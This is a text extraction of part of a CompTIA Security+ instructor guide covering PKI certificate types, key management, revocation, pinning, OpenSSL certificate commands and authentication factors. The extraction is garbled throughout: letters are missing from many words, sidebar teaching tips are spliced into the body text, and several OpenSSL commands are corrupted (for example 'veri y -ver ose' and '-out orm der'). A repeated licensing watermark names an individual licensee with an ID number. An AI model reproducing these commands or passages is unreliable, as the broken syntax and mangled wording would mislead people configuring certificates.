The AN field M T tools.ietf.org html rfc section . .
be configured with the
DN. The subject alternative name (SAN) e tension field is structured to represent
Despite being
di erent types of identifiers, including domain names. If a certificate is configured with
deprecated for this a AN, the browser should validate that, and ignore the CN value. It is still safer to put
usage, it is safer the DN is the CN as well, because not all browsers and implementations stay up to
to duplicate this date with the standards.
information in the
CN knowledge. The AN field also allows a certificate to represent di erent subdomains, such as www.
digicert.com solution comptia.org and members.comptia.org.
to ensure
compatibility.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 131

icrosoft s website certificate configured with alternative sub ect names for different subdomains.
(Screenshot used with permission from icrosoft.)

Listing the specific subdomains is more secure, but if a new subdomain is added, a new
certificate must be issued. A wildcard domain, such as *.comptia.org, means that
the certificate issued to the parent domain will be accepted as valid for all subdomains
to a single level .

CompTIA s website certificate configured with a wildcard domain, allowing access via either https://
comptia.org or https://www.comptia.org. (Screenshot used with permission from icrosoft.)

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 132 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) T pes o Certificate

Types of Certificate
Certificate policies define the di erent uses of certificate types issued by the CA.
These can be configured as standard certificate templates.
A certificate type is set by configuring the the ey sage attribute. The tended
ey sage field referred to by Microsoft as Enhanced Key Usage is a
complementary means of defining usage. Typical values used include erver
Authentication, Client Authentication, Code igning, or mail rotection. The field
is more e ible than the ey sage field, but problems can occur when non standard
or vendor specific definitions are used.
An e tension can be tagged as critical, meaning that the application processing the
certificate must be able to interpret the e tension correctly otherwise, the certificate
should be re ected. In the case of a ey sage e tension marked as critical, an
application should re ect the certificate if it cannot resolve the ey sage value. or
e ample, this prevents a certificate issued for encrypting traffic sent to a web server
from being used for signing an email message.

Certificate templates for indows Server CA. (Screenshot used with permission from icrosoft.)

Show Slide(s) e er er Certificate T pes

eb erver Certificate
A ser er certificate guarantees the identity of e commerce sites or any sort of website
Types to which users submit data that should be kept confidential. ne of the problems with
public key cryptography and trust models is that anyone can set up a I solution. It is
Teaching also simple to register convincing sounding domain names, such as my bank server.
Tip foo, where the real domain is mybank.foo. If users choose to trust a certificate in
Make sure students the na ve belief that simply having a certificate makes a site trustworthy, they could
can distinguish D and e pose themselves to fraud. There have also been cases of disreputable sites obtaining
and understand the certificates from third party CAs that are automatically trusted by browsers that
use of AN or wildcard apparently validate their identities as financial institutions.
certificates.
Di erently graded certificates might be used to provide levels of security for e ample,
an online bank re uires higher security than a site that collects marketing data.
• Domain alidation D proving the ownership of a particular domain. This may be
proved by responding to an email to the authori ed domain contact or by publishing
a te t record to the domain. This process can be highly vulnerable to compromise.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 133

omain validation certificate. Only the padlock is shown and the browser reports that the owner is not
verified. (Screenshot used with permission from icrosoft.)

• tended alidation sub ecting to a process that re uires more rigorous

checks on the sub ect's legal identity and control over the domain or software being
signed. standards are maintained by the CA rowser forum cabforum.org . An
certificate cannot be issued for a wildcard domain.

Extended validation certificate from GlobalSign with the verified owner shown in green next to the
padlock. (Screenshot used with permission from GlobalSign, Inc.)

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 134 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) ther Certificate T pes

ther Certificate Types
eb servers are not the only systems that need to validate identity. There are many
other certificate types, designed for di erent purposes.
Teaching
Tip achine Computer Certificates
tudents should learn It might be necessary to issue certificates to machines servers, Cs, smartphones, and
the uses and AN
CN setting for these
tablets , regardless of function. or e ample, in an Active Directory domain, machine
certificate types. certificates could be issued to Domain Controllers, member servers, or even client
workstations. Machines without valid domain issued certificates could be prevented
from accessing network resources. Machine certificates might be issued to network
appliances, such as routers, switches, and firewalls. The AN and often the CN attribute
should be set to the DN of the machine host name and local domain part .

mail ser Certificates

An email certificate can be used to sign and encrypt email messages, typically using
ecure Multipart Internet Message tensions MIM or retty ood rivacy .
The user's email address must be entered as the AN and CN. n a directory based
local network, such as indows Active Directory, there may be a need for a wider
range of user certificate types. or e ample, in AD there are user certificate templates
for standard users, administrators, smart card logon users, recovery agent users,
and change mail users with separate templates for signature and encryption . ach
certificate template has di erent key usage definitions.

e uesting a certificate. The CA has made several user-type certificate templates available with
different key usage specifications (encrypting files, signing emails, encrypting emails, and so on).
(Screenshot used with permission from icrosoft.)

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 135

Code i nin Certificates

A code signing certificate is issued to a software publisher, following some sort
of identity check and validation process by the CA. The publisher then signs the
e ecutables or DLLs that make up the program to guarantee the validity of a software
application or browser plug in. ome types of scripting environments, such as
ower hell, can also re uire valid digital signatures. The CN is set to an organi ation
name, such as CompTIA Development ervices, LLC, rather than a DN.

oot Certificate
The root certificate is the one that identifies the CA itself. The root certificate is
self signed. A root certificate would normally use a key si e of at least bits.
Many providers are switching to bits. The CN for a root certificate is set to the
organi ation CA name, such as CompTIA oot CA, rather than an DN.

el si ned Certificates
Any machine, web server, or program code can be deployed with a self-signed
certificate. elf signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 136 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
erti cates and erti cate Authorities
Answer the following uestions

1. What is the main weakness of a hierarchical trust model?

The structure depends on the integrity of the root CA.

2. o does a su ect o a out o tainin a certificate rom a CA

In most cases, the sub ect generates a key pair then adds the public key along with
sub ect information and certificate type in a certificate signing re uest C and
submits it to the CA. If the CA accepts the re uest, it generates a certificate with the
appropriate key usage and validity, signs it, and transmits it to the sub ect.

3. hat cr pto raphic in ormation is stored in a di ital certificate

The sub ect's public key and the algorithms used for encryption and hashing. The
certificate also stores a digital signature from the issuing CA, establishing the chain of
trust.

4. hat does it mean i a certificate e tension attri ute is mar ed as critical

That the application processing the certificate must be able to interpret the e tension
correctly. therwise, it should re ect the certificate.

5. ou are de elopin a secure e application hat sort o certificate should

you request to show that you are the publisher of a program?

A code signing certificate. Certificates are issued for specific purposes. A certificate
issued for one purpose should not be reused for other functions.

6. hat e tension field is used ith a e ser er certificate to support the

identification o the ser er multiple specific su domain la els

The sub ect alternative name AN field. A wildcard certificate will match any
subdomain label.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 137

Topic 6B
Implement PKI Management

EXAM OBJECTIVES COVERED Teaching

3.9 Given a scenario, implement public key infrastructure Tip
.1 Given a scenario, use the appropriate tool to assess organizational security
Again, you may prefer
(OpenSS only)
to focus more on labs
for this topic. Most of
As a security professional, you are very likely to have to install and maintain public the content e amples
key infrastructure I certificate services for private networks. ou may also need to are straightforward,
though students can
obtain and manage certificates from public I providers. This topic will help you to
find certificate formats
install and configure I and to troubleshoot and revoke certificates. difficult.

Certificate and e ana ement Show Slide(s)

Key management refers to operational considerations for the various stages in a key's Certificate and ey
life cycle. A key's life cycle may involve the following stages Management
• ey generation creating a secure key pair of the re uired strength, using the
Teaching
chosen cipher.
Tip
• Certificate generation to identify the public part of a key pair as belonging to a e're focusing
sub ect user or computer , the sub ect submits it for signing by the CA as a digital on public key
certificate with the appropriate key usage. At this point, it is critical to verify the cryptography
here, but do note
identity of the sub ect re uesting the certificate and only issue it if the sub ect that symmetric
passes identity checks. keys and keys
have management
• torage the user must take steps to store the private key securely, ensuring that re uirements too.
unauthori ed access and use is prevented. It is also important to ensure that the e'll be covering
private key is not lost or damaged. later in the course.

• evocation if a private key is compromised, the key pair can be revoked to prevent
users from trusting the public key.

• piration and renewal a key pair that has not been revoked e pires after a certain
period. iving the key or certificate a shelf life increases security. Certificates can
be renewed with new key material.

ey management can be centralized, meaning that one administrator or authority

controls the process, or decentralized, in which each user is responsible for his or
her keys.
Certificate and key management can represent a critical vulnerability if not managed
properly. If an attacker can obtain a private key, it puts both data confidentiality and
identification authentication systems at risk. If an attacker gains the ability to create
signed certificates that appear to be valid, it will be easy to harvest huge amounts of
information from the network as the user and computer accounts he or she sets up will
be automatically trusted. inally, if a key used for encryption is accidentally destroyed,
the data encrypted using that key will be inaccessible, unless there is a backup or key
recovery mechanism.

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 138 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) e eco er and scro

ey ecovery and
eys such as the private key of a root CA must be sub ect to the highest possible
scrow technical and procedural access controls. If such a key were compromised, it would
put the confidentiality and integrity of data processed by hundreds or thousands of
systems at risk. Access to such critical encryption keys must be logged and audited
and is typically sub ect to M-of-N control, meaning that of N number of administrators
permitted to access the system, M must be present for access to be granted. M must
be greater than , and N must be greater than M. or e ample, when M and
N , any two of four administrators must be present. ta authori ed to perform
key management must be carefully vetted, and due care should be taken if these
employees leave the business.

Another way to use -of- control is to split a key between several storage devices (such as
three US sticks, any two of which could be used to recreate the full key).

If the key used to decrypt data is lost or damaged, the encrypted data cannot be
recovered unless a backup of the key has been made. A significant problem with key
storage is that if you make multiple backups of a key, it is e ponentially more difficult
to ensure that the key is not compromised. owever, if the key is not backed up, the
storage system represents a single point of failure. ey recovery defines a secure
process for backing up keys and or recovering data encrypted with a lost key. This
process might use M of N control to prevent unauthori ed access to and use of
the archived keys. Escrow means that something is held independently. In terms of
key management, this refers to archiving a key or keys with a third party. This is a
useful solution for organi ations that don't have the capability to store keys securely
themselves, but it invests a great deal of trust in the third party.

Show Slide(s) Certificate piration

Certificate piration
Certificates are issued with a limited duration, as set by the CA policy for the certificate
type. oot certificates might have long e piration dates years , whereas web
server and user certificates might be issued for year only. Typically, a certificate is
renewed before it e pires. here a user is in possession of a valid certificate, less
administration is re uired in terms of checking identity than with a re uest for a new
certificate. hen you are renewing a certificate, it is possible to use the e isting key
referred to specifically as key renewal or generate a new key the certificate is rekeyed .
A new key might be generated if the old one was no longer considered long enough or
if any compromise of the key was feared.
hen a certificate e pires, there is the uestion of what to do with the key pair that
it represents. A key can either be archived or destroyed. Destroying the key o ers
more security, but has the drawback that any data encrypted using the key will be
unreadable. hether a key is archived or destroyed will largely depend on how the key
was used. In software terms, a key can be destroyed by overwriting the data merely
deleting the data is not secure . A key stored on hardware can be destroyed by a
specified erase procedure or by destroying the device.

Show Slide(s) Certificate e ocation ists

Certificate evocation
A certificate may be revoked or suspended
Lists • A revoked certificate is no longer valid and cannot be un revoked or reinstated.

• A suspended certificate can be re enabled.

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 139

A certificate may be revoked or suspended by the owner or by the CA for many

reasons. or e ample, the certificate or its private key may have been compromised,
the business could have closed, a user could have left the company, a domain name
could have been changed, the certificate could have been misused in some way, and
so on. These reasons are codified under choices such as nspecified, ey Compromise,
CA Compromise, uperseded, or Cessation of peration. A suspended key is given the
code Certificate old.
It follows that there must be some mechanism for informing users whether a certificate
is valid, revoked, or suspended. CAs must maintain a certificate revocation list
(CRL) of all revoked and suspended certificates, which can be distributed throughout
the hierarchy.

C s published by indows Certificate Services The current C contains one revoked certificate.
(Screenshot used with permission from icrosoft.)

ith the C L system, there is a risk that the certificate might be revoked but still
accepted by clients because an up to date C L has not been published. A further
problem is that the browser or other application may not be configured to
perform C L checking, although this now tends to be the case only with legacy
browser software.

nline Certificate tatus rotocol esponders Show Slide(s)

Another means of providing up to date information is to check the certificate's status nline Certificate
on an nline Certificate tatus rotocol C server, referred to as an OCSP tatus rotocol
responder. ather than return a whole C L, this ust communicates the status of the esponders
re uested certificate. Details of the C responder service should be published in
the certificate.

ost OCSP servers can uery the certificate database directly and obtain the real-time
status of a certificate. Other OCSP servers actually depend on the C s and are limited by
the C publishing interval.

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 140 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ne of the problems with C is that the ob of responding to re uests is resource

intensive and can place high demands on the issuing CA running the C responder.
There is also a privacy issue, as the C responder could be used to monitor and
record client browser re uests. C stapling resolves these issues by having the L
TL web server periodically obtain a time stamped C response from the CA. hen
a client submits an C re uest, the web server returns the time stamped response,
rather than making the client contact the C responder itself.

Show Slide(s) Certificate innin

Certificate inning
hen certificates are used by a transport protocol, such as L TL , there is
a possibility that the chain of trust among the client, the server, and whatever
intermediate and root CAs have provided certificates can be compromised. If an
adversary can substitute a malicious but trusted certificate into the chain using
some sort of pro y or man in the middle attack , they could be able to snoop on the
supposedly secure connection.
Pinning refers to several techni ues to ensure that when a client inspects the
certificate presented by a server or a code signed application, it is inspecting the
proper certificate. This might be achieved by embedding the certificate data in the
application code, or by submitting one or more public keys to an TT browser via an
TT header, which is referred to as TTP Public ey Pinning ( P P).

HPKP has serious vulnerabilities and has been deprecated (developer.mozilla.org en-
US docs eb TTP Public ey Pinning). The replacement mechanism is the Certificate
Transparency Framework.

Show Slide(s) Certificate ormats

Certificate ormats
There are various formats for encoding a certificate as a digital file for e change
between di erent systems.
Teaching
Tip Encoding
Di erences between
Cryptographic data both certificates and keys are processed as binary using
indows and Linu
make certificate Distinguished Encoding Rules (DER). inary format files are not commonly used,
formats a far more however.
comple issue than
More typically, the binary data is represented as ASCII te t characters using ase
it really should be.
plain that there Privacy-enhanced Electronic Mail (PEM) encoding. A CII format data has descriptive
are binary and te t headers, such as the IN C TI ICAT string.
formats, and then
go through the
e tensions.

ase6 -encoded .CE file opened in otepad. (Screenshot used with permission from icrosoft.)

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 141

ile tensions
A three character file e tension is a convention, not a standard, and unfortunately file
e tensions do not always map cleanly to the type of encoding used within a certificate
file, or even to the contents of a certificate file. The only certain way to check is to open
it in a te t editor.
• oth .D and . M can be used as file e tensions, although the latter is not
recogni ed by indows. . M is the the most widely used e tension for A CII
format files in Linu .

• The .C T and .C e tensions can also be used, but they they are not well
standardi ed. Most of the confusion arises from the way indows handles
certificates. In Linu , .C T is most likely to represent an A CII certificate. In indows,
the most common e tension is .C , but this does not tell you whether the file
format is binary or A CII.

Contents
A certificate file can also contain more than ust a single certificate
• The PKCS #12 format allows the e port of the private key with the certificate. This
would be used either to transfer a private key to a host that could not generate
its own keys, or to back up archive a private key. This type of file format is usually
password protected and always binary. n indows, these usually have a .PFX
e tension, while Mac and i use . . In Linu , the certificate and key are
usually stored in separate files.

• The P7B format implements C , which is a means of bundling multiple

certificates in the same file. It is typically in A CII format. This is most often used
to deliver a chain of certificates that must be trusted by the processing host. It
is associated with the use of MIM to encrypt email messages. files do
not contain the private key. In Linu , the . M e tension is very widely used for
certificate chains.

OpenSSL Show Slide(s)

In a indows environment, certificate infrastructure is installed and managed as Active pen L

Directory Certificate ervices. There is a certutil tool for command line management, or
you can use ower hell. Teaching
or Linu , CA services are typically implemented using the pen L suite openssl.org . Tip
The following represent a few of the many operations that can be accomplished using This section is
openssl commands. illustrative of some
pen L commands.
Root CA Note again that
in Linu the file
To configure a root CA in pen L, set up a directory structure and adapt an pen L e tension is
conventional only.
configuration file openssl.cnf for any site local settings. ou then need to create an Certificates are used
A key pair in A CII format. A
private key might be
openssl genrsa -aes256 -out cakey.pem 4096 encrypted to apply
password protection.
The -aes256 argument encrypts the key and re uires a password to make use of it.
The 4096 argument sets the key length. The output file data is in M A CII format by
default. ome sites prefer a naming convention, such as ca.key.
The ne t step is to use this A key pair to generate a self signed root . digital
certificate

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 142 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

openssl req -config openssl.cn -key cakey.pem -new

-x509 -days 7300 -sha256 -out cacert.pem

This example is simplified. Using a root CA to issue leaf certificates directly is not robust. It is
better to create one or more intermediate CAs.

Certificate i nin e uests

To configure a certificate on a host, create a certificate signing re uest C with a new
key pair. This command is run on the web server
openssl req -nodes -new -newkey rsa:2048 -out
www.csr -keyout www.key
aving run the command, you then complete the prompts to enter the sub ect
information for the certificate, taking care to match the common name CN to the
DN by which clients access the server. This key is created without a password, which
would have to be input at any restart of the web server application. e can rely on
general access control security measures to protect the key.
This C file must then be transmitted to the CA server. n the CA, run the following
command to sign the C and output the . certificate
openssl ca -config openssl.cn -extensions we server
-infiles www.csr -out www.pem
The passphrase must be entered to confirm use of the cakey.pem private key. The
-extensions argument selects an area of the configuration file for a particular
certificate type. This sets the key usage attribute, plus any other e tended attributes
that are needed.
ou can view the new certificate to check the details using the following two
commands
openssl x509 -noout -text -in www.pem
openssl veri y -ver ose -cafile cacert.pem www.pem
Transmit the www.pem file to the web server and update the server configuration to
use it and the www.key private key.

e and Certificate ana ement

ou might e port a copy of the private key from this server to be held in escrow as a
backup. or this usage, you must password protect the key
openssl rsa -aes256 -in www.key -out www.key.bak
ou might need to convert the certificate format to make it compatible with an
application server, such as Java. The following command takes a M encoded
certificate and outputs a D binary encoded certificate
openssl x509 -out orm der -in www.pem -out www.der
Another use case is to e port a key and certificate for use in indows
openssl pkcs12 -export -inkey www.key -in www.pem
-out www.p x

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 143

Certificate Issues Show Slide(s)

The most common problem when dealing with certificate issues is that of a client Certificate Issues
re ecting a server certificate or slightly less commonly, an authentication server
re ecting a client's certificate . Teaching
• If the problem is with an e isting certificate that has been working previously, check Tip
that the certificate has not e pired or been revoked or suspended. Troubleshooting is no
longer called out on
• If the problem is with a new certificate, check that the key usage settings are the syllabus, so you
may prefer to skip this
appropriate for the application. ome clients, such as N and email clients, have
section. It has been
very specific re uirements for key usage configuration. Also, check that the sub ect retained as general
name is correctly configured and that the client is using the correct address. or implementation detail.
e ample, if a client tries to connect to a server by I address instead of DN, a oint out that
certificate configured with an DN will be re ected. browsers often use a
di erent set of root
• If troubleshooting a new certificate that is correctly configured, check that clients trusts than indows
have been configured with the appropriate chain of trust. ou need to install root itself does.
and intermediate CA certificates on the client before a leaf certificate can be trusted.
e aware that some client applications might maintain a di erent certificate store to
that of the .

• In either case, verify that the time and date settings on the server and client
are synchroni ed. Incorrect date time settings are a common cause of
certificate problems.

rom a security point of view, you must also audit certificate infrastructure to
ensure that only valid certificates are being issued and trusted. eview logs of issued
certificates periodically. alidate the permissions of users assigned to manage
certificate services. Check clients to ensure that only valid root CA certificates are
trusted. Make sure clients are checking for revoked or suspended certificates.

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 144 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
PKI Management
Answer the following uestions

1. What are the potential consequences if a company loses control of a

pri ate e

It puts both data confidentiality and identification and authentication systems at risk.
Depending on the key usage, the key may be used to decrypt data with authori ation.
The key could also be used to impersonate a user or computer account.

2. You are advising a customer about encryption for data backup security and
the e escro ser ices that ou o er o should ou e plain the ris s o
key escrow and potential mitigations?

Escrow refers to archiving the key used to encrypt the customer's backups with your
company as a third party. The risk is that an insider attack from your company may be
able to decrypt the data backups. This risk can be mitigated by re uiring M of N access
to the escrow keys, reducing the risk of a rogue administrator.

3. What mechanism informs clients about suspended or revoked keys?

ither a published Certificate evocation List C L or an nline Certificate tatus

rotocol C responder.

4. What mechanism does HPKP implement?

TT ublic ey inning ensures that when a client inspects the certificate

presented by a server or a code signed application, it is inspecting the proper
certificate by submitting one or more public keys to an TT browser via an TT
header.

5. hat t pe o certificate ormat can e used i ou ant to trans er our

pri ate e and certificate rom one indo s host computer to another

C . . .

6. What type of operation is being performed by the following command?

openssl req -nodes -new -newkey rsa:2048 -out my.csr

-keyout mykey.pem
This generates a new A key pair plus a certificate signing re uest.

Lesson 6: Implementing Public Key Infrastructure | Topic 6B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 145

Lesson 6
Summary
Teaching
ou should be familiar with the tools and procedures used to issue di erent types of
Tip
certificate and manage I operations.
Check that students
are confident about
uidelines or Implementin u lic e In rastructure the content that has
been covered. If there
ollow these guidelines when you implement public key infrastructure I on a is time, revisit any
private network content e amples that
they have uestions
• Determine whether to use a single CA or intermediate structure and take steps to about. If you have
ensure the security of the root, keeping it o ine if that is operationally possible. used all the available
time for this lesson
• Determine certificate policies and templates that meet the needs of users and block, note the issues
business work ows, such as machine, email user, and code signing certificate and schedule time for
a review later in the
types. nsure that the common name attribute is correctly configured when
course.
issuing certificates.

• Create policies and procedures for users and servers to re uest certificates, plus the
identification, authentication, and authori ation processes to ensure certificates are
only issued to valid sub ects.

• upport users with options for converting certificates to di erent formats.

• et up procedures for managing keys and certificates, including revocation and

backup escrow of keys.

• e prepared to assist users with certificate troubleshooting issues.

Lesson 6: Implementing Public Key Infrastructure

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 7
Implementing Authentication Controls

LESSON INTRODUCTION Teaching

Tip
ach network user and host device must be identified with an account so that you Continuing the protect
can control their access to your organi ation's applications, data, and services. function theme,
The processes that support this re uirement are referred to as identity and access this lesson and the
management IAM . ithin IAM, authentication technologies ensure that only valid following one cover
sub ects users or devices can operate an account. Authentication re uires the account identity and access
management IAM .
holder to submit credentials that should only be known or held by them in order to
This lesson focuses
access the account. There are many authentication technologies and it is imperative on authentication
that you be able to compare and contrast and to implement these security controls. mechanisms, whereas
Lesson 8 covers
identity management,
Lesson Objectives account management,
and authori ation
In this lesson, you will management.
• ummari e authentication design concepts.

• Implement knowledge based authentication.

• Implement authentication technologies.

• ummari e biometrics authentication concepts.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 148 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 7A
Summarize Authentication
esign oncepts

Teaching EXAM OBJECTIVES COVERED

Tip 2.4 Summarize authentication and authorization design concepts
This topic introduces
IAM as a domain
of security activity
trong authentication is the first line of defense in the battle to secure network
and discusses basic
concepts, following resources. ut authentication is not a single process there are many di erent methods
the relevant content and mechanisms, some of which can be combined to form more e ective products.
e amples from the As a network security professional, familiari ing yourself with identification and
design ob ective authentication technologies can help you select, implement, and support the ones that
. . The remainder of are appropriate for your environment.
the . ob ectives are
covered throughout
Lessons and . Identit and Access ana ement
Show Slide(s)
An access control system is the set of technical controls that govern how sub ects may
interact with ob ects. ub ects in this sense are users, devices, or software processes,
Identity and Access or anything else that can re uest and be granted access to a resource. b ects are the
Management resources these could be networks, servers, databases, files, and so on. An identity
Teaching and access management (IAM) system is usually described in terms of four main
Tip processes
Stress the distinction • Identification creating an account or ID that uni uely represents the user, device,
between identification or process on the network.
basically, performing
identity proofing • Authentication proving that a sub ect is who or what it claims to be when it
and creating a attempts to access the resource.
user account and
authentication the • Authorization determining what rights sub ects should have on each resource,
process that proves
and enforcing those rights.
that a user account is
being accessed by the
user for whom it was
• Accounting tracking authori ed usage of a resource or use of rights by a sub ect
created . and alerting when unauthori ed use is detected or attempted.
The term IAM re ects
the importance of
the identification
component, which is
omitted in the earlier
AAA framework.
tudents can think of
IAAAM, perhaps.

Lesson 7: Implementing Authentication Controls | Topic 7A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 149

ifferences among identification, authentication, authorization, and accounting. (Images 1 .com.)

IAM enables you to define the attributes that make up an entity's identity, such as its
purpose, function, security clearance, and more. These attributes subse uently enable
access management systems to make informed decisions about whether to grant
or deny an entity access, and if granted, decide what the entity has authori ation to
do. or e ample, an individual employee may have his or her own identity in the IAM
system. The employee's role in the company factors into his or her identity, such as
what department the employee is in and whether the employee is a manager. or
e ample, if you are setting up an e commerce site and want to enroll users, you need
to select the appropriate controls to perform each function
• Identification ensure that customers are legitimate. or e ample, you might need
to ensure that billing and delivery addresses match and that they are not trying to
use fraudulent payment methods.

• Authentication ensure that customers have uni ue accounts and that only they
can manage their orders and billing information.

• Authori ation rules to ensure customers can place orders only when they
have valid payment mechanisms in place. ou might operate loyalty schemes or
promotions that authori e certain customers to view uni ue o ers or content.

• Accounting the system must record the actions a customer takes to ensure that
they cannot deny placing an order, for instance .

The servers and protocols that implement these functions are referred to as
authentication, authorization, and accounting (AAA). The use of IAM to describe
enterprise processes and work ows is becoming more prevalent as the importance of
the identification phase is better acknowledged.

Lesson 7: Implementing Authentication Controls | Topic 7A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 150 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Authentication actors

Authentication actors
Assuming that an account has been created securely the identity of the account holder
has been verified , authentication verifies that only the account holder is able to use
Teaching the account, and that the system may only be used by account holders. Authentication
Tip is performed when the account holder supplies the appropriate credentials or
Multifactor authenticators to the system. These are compared to the credentials stored on the
authentication as system. If they match, the account is authenticated.
a principle should
be familiar to the There are many di erent technologies for defining credentials and can be categori ed
students from A and as factors.
Network , but there
are some additional Something You Know Authentication
attributes concepts
that re uire attention. The typical knowledge factor is the logon, composed of a username and a password.
e present the detail The username is typically not a secret although it should not be published openly ,
on the ownership and but the password must be known only to the account holder. A passphrase is a longer
biometric factors in password composed of several words. This has the advantages of being more secure
separate topics later in
the lesson.
and easier to remember. A personal identification num er I is also something
you know, although long IN codes are hard to remember, and short codes are
ou might want
to note the use of too vulnerable for most authentication systems. wipe patterns are often used for
CA TC A here too. authentication to touch based devices.
This isn't a content
e ample, but it is in
the acronyms list and
included as a glossary
term.

Windows sign-in screen. (Screenshot used with permission from Microsoft.)

A knowledge factor is also used for account reset mechanisms. or e ample, to reset
the password on an account, the user might have to respond to a challenge uestion,
such as, hat is your favorite movie

Something You Have Authentication

An ownership factor means that the account holder possesses something that no one
else does, such as a smart card, fob, or wristband programmed with a uni ue identity

Lesson 7: Implementing Authentication Controls | Topic 7A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 151

certificate or account number. Alternatively, they might have a fob that generates
a uni ue code. These ownership factors can be described as hard tokens.
A device such as a smartphone can also be used to receive a uni uely generated
access code as a soft token. nlike a password, these tokens are valid for only one use,
typically within a brief time window.

Something You Are/Do Authentication

A biometric factor uses either physiological identifiers, such as a fingerprint, or
behavioral identifiers, such as the way someone moves gait . The identifiers are
scanned and recorded as a template. hen the user authenticates, another scan is
taken and compared to the template.

Authentication esi n Show Slide(s)

Authentication design refers to selecting a technology that meets re uirements for Authentication Design
confidentiality, integrity, and availability
• Confidentiality, in terms of authentication, is critical, because if account credentials
are leaked, threat actors can impersonate the account holder and act on the system
with whatever rights they have.

• Integrity means that the authentication mechanism is reliable and not easy for
threat actors to bypass or trick with counterfeit credentials.

• Availability means that the time taken to authenticate does not impede work ows
and is easy enough for users to operate.

Authentication is used in di erent conte ts and factors are not always well suited
to a conte t. or e ample, you might authenticate to a C by inputting a password
to get access to the device. This might also authenticate you to a network. ut
authentication is also used for physical security. If you consider numerous employees
arriving for work, asking them to type a password to gain access to the building
would take too long and cause huge disruption lack of availability . It is also highly
likely that passwords would be observed lack of confidentiality . inally, it is likely
that users would simply start holding the door open for each other lack of integrity .
Authentication design tries to anticipate these issues and implements a technology that
fits the use case.

ulti actor Authentication Show Slide(s)

An authentication technology is considered strong if it combines the use of more than Multifactor
one type of knowledge, ownership, and biometric factor, and is called multifactor Authentication
authentication (MFA). ingle factor authentication can uite easily be compromised a
password could be written down or shared, a smart card could be lost or stolen, and a Teaching
biometric system could be sub ect to high error rates or spoofing. Tip
e will introduce the
Two- actor Authentication ( A) combines either an ownership based smart card or concept later, but you
biometric identifier with something you know, such as a password or IN. Three factor might want to mention
authentication combines all three technologies, or incorporates an additional attribute, step verification
such as location for e ample, a smart card with integrated fingerprint reader. This here, to contrast with
means that to authenticate, the user must possess the card, the user's fingerprint must M A.
match the template stored on the card, and the user must input a IN or password.

ultifactor authentication re uires a combination of different technologies. or example,

re uiring a PI along with date of birth may be stronger than entering a PI alone, but it is
not multifactor.

Lesson 7: Implementing Authentication Controls | Topic 7A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
